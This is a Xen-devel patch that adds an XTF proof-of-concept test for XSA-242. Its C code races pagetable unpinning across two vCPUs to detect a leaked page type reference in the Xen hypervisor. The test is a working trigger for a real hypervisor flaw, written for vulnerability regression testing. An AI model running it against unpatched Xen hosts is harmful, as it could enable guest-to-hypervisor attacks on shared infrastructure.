
[Xen-devel] [PATCH XTF] XSA-242 PoC


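Try to lose the race between one vCPU unpinning an L2 pagetable and Xen
validating a new entry written into it on behalf of the other vCPU, then
check whether the same page can still be pinned as an L3. A failing
re-pin indicates a leaked page type reference, i.e. a vulnerable
hypervisor.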

Signed-off-by: Jan Beulich <jbeulich@xxxxxxxx>

--- /dev/null
+++ b/tests/xsa-242/Makefile
@@ -0,0 +1,11 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-242
+CATEGORY  := xsa
+TEST-ENVS := pv64
+
+TEST-EXTRA-CFG := extra.cfg.in
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
--- /dev/null
+++ b/tests/xsa-242/extra.cfg.in
@@ -0,0 +1,2 @@
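+# The PoC races pagetable (un)pinning between two vCPUs.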
+vcpus=2
--- /dev/null
+++ b/tests/xsa-242/main.c
@@ -0,0 +1,191 @@
+/**
+ * @file tests/xsa-242/main.c
+ * @ref test-xsa-242
+ *
+ * @page test-xsa-242 XSA-242
+ *
+ * Advisory: [XSA-242](http://xenbits.xen.org/xsa/advisory-242.html)
+ *
+ * This PoC tries to lose the race between one vCPU unpinning an L2
+ * pagetable and Xen validating a new entry written into it on behalf
+ * of the other vCPU.  If the same page can afterwards not be pinned
+ * as an L3, a page type reference was leaked and the hypervisor is
+ * vulnerable.
+ *
+ * @see tests/xsa-242/main.c
+ */
+#include <xtf.h>
+
+#include <xen/vcpu.h>
+
+#include <arch/pagetable.h>
+#include <arch/symbolic-const.h>
+
+const char test_title[] = "XSA-242 PoC";
+
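+/* Pin the pagetable at @va as a level @level table. */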
+static int hypercall_pin_table(unsigned int level, void *va)
+{
+    mmuext_op_t op = {
+        .cmd = MMUEXT_PIN_L1_TABLE + level - 1,
+        .arg1.mfn = virt_to_mfn(va),
+    };
+
+    return hypercall_mmuext_op(&op, 1, NULL, DOMID_SELF);
+}
+
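+/* Unpin the pagetable at @va. */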
+static int hypercall_unpin_table(void *va)
+{
+    mmuext_op_t op = {
+        .cmd = MMUEXT_UNPIN_TABLE,
+        .arg1.mfn = virt_to_mfn(va),
+    };
+
+    return hypercall_mmuext_op(&op, 1, NULL, DOMID_SELF);
+}
+
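+/* Mailbox: vCPU0 publishes a pagetable here for vCPU1 to unpin. */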
+static void *volatile table;
+
+static unsigned long vcpu1_stack[1024];
+
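+/*
+ * vCPU1 spins, unpinning whichever pagetable vCPU0 publishes via
+ * 'table'; this is the unpin half of the race.
+ */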
+static void vcpu1_main(void)
+{
+    for ( ; ; )
+    {
+        if ( table )
+        {
+            hypercall_unpin_table(table);
+            table = NULL;
+        }
+    }
+}
+
+void test_main(void)
+{
+    static intpte_t l2t[L2_PT_ENTRIES] __page_aligned_bss;
+    static intpte_t l1t[L1_PT_ENTRIES] __page_aligned_bss;
+    static char data[PAGE_SIZE] __page_aligned_bss;
+    struct xen_vcpu_guest_context gc = {
+        .user_regs.cs = __KERN_CS,
+        .user_regs.eip = (long)vcpu1_main,
+        .user_regs.ss = __KERN_DS,
+        .user_regs.esp = (long)(vcpu1_stack + ARRAY_SIZE(vcpu1_stack)),
+        .user_regs.flags = X86_EFLAGS_IF | 0x1000,
+        .user_regs.ds = __KERN_DS,
+        .user_regs.es = __KERN_DS,
+        .flags = VGCF_in_kernel,
+        .kernel_ss = __KERN_DS,
+        .kernel_sp = (long)(vcpu1_stack + ARRAY_SIZE(vcpu1_stack)),
+        .ctrlreg[3] = read_cr3(),
+    };
+    unsigned int i;
+    int rc;
+
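+    /* Point every entry of the L1 table at the data page, read-only. */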
+    for ( i = 0; i < L1_PT_ENTRIES; ++i )
+        l1t[i] = pte_from_virt(data, PF_SYM(AD, P));
+
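+    /*
+     * Xen refuses to validate a pagetable which still has writable
+     * mappings, so remap everything read-only up front.  'data' is
+     * included because the L3 pin below re-interprets it as an L1 table.
+     */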
+    rc = hypercall_update_va_mapping(_u(l2t),
+                                     pte_from_virt(l2t, PF_SYM(AD, P)),
+                                     UVMF_INVLPG);
+    if ( rc )
+        return xtf_error("Failed to remap L2 pt as read-only: %d\n", rc);
+
+    rc = hypercall_update_va_mapping(_u(l1t),
+                                     pte_from_virt(l1t, PF_SYM(AD, P)),
+                                     UVMF_INVLPG);
+    if ( rc )
+        return xtf_error("Failed to remap L1 pt as read-only: %d\n", rc);
+
+    rc = hypercall_update_va_mapping(_u(data),
+                                     pte_from_virt(data, PF_SYM(AD, P)),
+                                     UVMF_INVLPG);
+    if ( rc )
+        return xtf_error("Failed to remap data as read-only: %d\n", rc);
+
+    /* Bring up the other vcpu. */
+    rc = hypercall_vcpu_op(VCPUOP_initialise, 1, &gc);
+    if ( rc )
+        return xtf_error("Could not init vCPU #1 (%d)\n", rc);
+
+    rc = hypercall_vcpu_op(VCPUOP_up, 1, NULL);
+    if ( rc )
+        return xtf_error("Could not start vCPU #1 (%d)\n", rc);
+
+    while ( (rc = hypercall_vcpu_op(VCPUOP_is_up, 1, NULL)) == 0 )
+        hypercall_yield();
+
+    if ( rc < 0 )
+        return xtf_error("Could not check vCPU #1 state (%d)\n", rc);
+
+    /* We're trying to lose a race, so try a number of times. */
+    for ( i = 0; i < 1000; ++i )
+    {
+        mmu_update_t mu;
+
+        rc = hypercall_pin_table(2, l2t);
+        if ( rc )
+            return xtf_error("Failed to pin L2 pt: %d\n", rc);
+
+        /*
+         * Kick off the other vCPU and link L1 into L2.  'table' is
+         * published first so that vCPU1's unpin races against Xen's
+         * validation of the new L2 entry.
+         */
+        mu.ptr = virt_to_maddr(l2t) | MMU_NORMAL_PT_UPDATE;
+        mu.val = virt_to_maddr(l1t) | PF_SYM(AD, RW, P);
+        table = l2t;
+        rc = hypercall_mmu_update(&mu, 1, NULL, DOMID_SELF);
+        if ( rc )
+            return xtf_error("Failed to link L1 into L2: %d\n", rc);
+
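+        /* Wait for vCPU1 to have issued its unpin. */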
+        do {
+            asm volatile ( "pause" ::: "memory" );
+        } while ( table );
+
+        rc = hypercall_unpin_table(l2t);
+        /*
+         * If our unpin succeeded, the other vCPU's unpin must have
+         * failed, i.e. it lost the race; try again.
+         */
+        if ( !rc )
+            continue;
+
+        /*
+         * Now try to pin the same table as an L3 one.  This should
+         * succeed on a fixed Xen; if the race leaked a type reference,
+         * the page is still typed L2 and the L3 pin fails.
+         */
+        rc = hypercall_pin_table(3, l2t);
+        if ( rc )
+            return xtf_failure("Fail: Vulnerable to XSA-242 (%u)\n", i);
+
+        rc = hypercall_unpin_table(l2t);
+        if ( rc )
+            return xtf_error("Failed to unpin L3: %d\n", rc);
+    }
+
+    xtf_success("Success: Apparently not vulnerable to XSA-242\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */